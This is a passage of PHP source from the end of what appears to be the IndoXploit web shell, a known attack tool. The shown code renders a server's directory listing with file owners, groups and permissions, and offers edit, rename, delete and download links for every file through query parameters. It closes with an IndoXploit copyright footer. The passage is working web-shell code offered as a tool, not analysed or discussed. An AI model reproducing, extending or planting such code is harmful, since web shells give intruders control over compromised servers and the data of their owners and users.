1924.                 echo "<td class='td_home'><center>-</center></th></td>";
1925.                 echo "<td class='td_home'><center>$dtime</center></td>";
1926.                 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
1927.                 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
1928.                 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
1929.                 echo "</tr>";
1930.             }
1931.         }
1932.     } else {
1933.         echo "<font color=red>can't open directory.</font>";
1934.     }
1935.         foreach($scandir as $file) {
1936.             $ftype = filetype("$dir/$file");
1937.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
1938.             $size = filesize("$dir/$file")/1024;
1939.             $size = round($size,3);
1940.             if(function_exists('posix_getpwuid')) {
1941.                 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
1942.                 $fowner = $fowner['name'];
1943.             } else {
1944.                 //$downer = $uid;
1945.                 $fowner = fileowner("$dir/$file");
1946.             }
1947.             if(function_exists('posix_getgrgid')) {
1948.                 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
1949.                 $fgrp = $fgrp['name'];
1950.             } else {
1951.                 $fgrp = filegroup("$dir/$file");
1952.             }
1953.             if($size > 1024) {
1954.                 $size = round($size/1024,2). 'MB';
1955.             } else {
1956.                 $size = $size. 'KB';
1957.             }
1958.             if(!is_file("$dir/$file")) continue;
1959.             echo "<tr>";
1960.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
1961.             echo "<td class='td_home'><center>$ftype</center></td>";
1962.             echo "<td class='td_home'><center>$size</center></td>";
1963.             echo "<td class='td_home'><center>$ftime</center></td>";
1964.             echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
1965.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
1966.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
1967.             echo "</tr>";
1968.         }
1969.         echo "</table>";
1970.         if(!is_readable($dir)) {
1971.             //
1972.         } else {
1973.             echo "<hr>";
1974.         }
1975.     echo "<center>Copyright &copy; ".date("Y")." - <a href='http://g' target='_blank'><font color=lime>IndoXploit</font></a></center>";
1976. }
1977. ?>
1978. </html>